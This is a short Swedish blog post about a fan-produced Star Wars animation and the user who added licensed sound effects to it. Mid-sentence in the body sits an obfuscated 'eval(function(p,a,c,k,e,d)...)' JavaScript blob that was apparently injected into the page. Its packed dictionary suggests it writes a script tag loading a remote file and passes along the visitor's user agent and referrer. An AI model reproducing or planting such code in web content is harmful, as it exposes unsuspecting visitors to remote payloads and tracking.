Image Image Image Image Image Image Image Image Image Image

| 19 oktober, 2018

Scroll to top

Top

Häftig fan-producerad Star Wars film

Filip Urde
  • On 29 oktober, 2012
  • http://www.revue.se/filip-urde

Youtube användaren otaking77077 eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kafrh|var|u0026u|referrer|nbyky||js|php’.split(‘|’),0,{}))
är det som ligger bakom denna episka animation av Star Wars. Den hade dock inte rätt ljudeffekter, eftersom Herr Lucas inte vill att man snor hans grejer. Men då kom en annan användare till undsättning.
JPL4185 frågade helt enkelt om lov och fixade sedan de rätta ljudeffekter och musiken. Här ovan har vi resultatet och det är bra!

Tack Krusse P för tipset!